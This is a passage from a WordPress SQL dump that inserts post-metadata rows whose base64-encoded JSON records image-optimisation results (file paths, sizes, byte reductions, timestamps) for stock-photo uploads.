NvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMzc1LCJpZCI6ODI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMzc4LCJpZCI6ODI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMzgwLCJpZCI6ODI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMzgzLCJpZCI6ODI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkzMTM0MzM1LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMzg2LCJpZCI6ODI2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29958, 825, 'wpfc_optimisation_reduction', '1899417'); 
INSERT INTO `wp_postmeta` VALUES (29959, 825, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLmpwZyIsIndpZHRoIjoyNTAwLCJoZWlnaHQiOjE2NjcsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfODMwMTE1MTMuanBnIiwicmVkdWN0aW9uIjoxODk5NDA0LCJ0aW1lIjoxNDgzNTgxMzk3LCJpZCI6IjgyNSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMzk5LCJpZCI6ODI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja184MzAxMTUxMy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja184MzAxMTUxMy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja184MzAxMTUxMy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MTQwMywiaWQiOjgyNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfODMwMTE1MTMtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfODMwMTE1MTMtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfODMwMTE1MTMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODE0MDYsImlkIjo4MjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja184MzAxMTUxMy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODE0MTAsImlkIjo4MjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNDEzLCJpZCI6ODI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja184MzAxMTUxMy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja184MzAxMTUxMy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja184MzAxMTUxMy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MTQxNSwiaWQiOjgyNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfODMwMTE1MTMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfODMwMTE1MTMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfODMwMTE1MTMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODE0MTgsImlkIjo4MjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNDIxLCJpZCI6ODI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNDIzLCJpZCI6ODI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNDI2LCJpZCI6ODI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNDI4LCJpZCI6ODI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNDMxLCJpZCI6ODI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzgzMDExNTEzLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxNDM0LCJpZCI6ODI1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29960, 796, 'wpfc_optimisation_reduction', '13316'); 
INSERT INTO `wp_postmeta` VALUES (29961, 796, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMuanBnIiwid2lkdGgiOjQ0OTYsImhlaWdodCI6MzAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MTQzOSwiaWQiOiI3OTYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTQ1LCJ0aW1lIjoxNDgzNTgxNDQyLCJpZCI6Nzk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MTMxNCwidGltZSI6MTQ4MzU4MTQ0NiwiaWQiOjc5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEyNDUsInRpbWUiOjE0ODM1ODE0NTAsImlkIjo3OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My0xNjAweDEwNjguanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTE2MDB4MTA2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTE2MDB4MTA2OC5qcGciLCJyZWR1Y3Rpb24iOjQ1OTQsInRpbWUiOjE0ODM1ODE0NTUsImlkIjo3OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NjMsInRpbWUiOjE0ODM1ODE0NTgsImlkIjo3OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDQ4MjQxNTkzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjUsInRpbWUiOjE0ODM1ODE0NjEsImlkIjo3OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQ0ODI0MTU5My0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180NDgyNDE1OTMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVy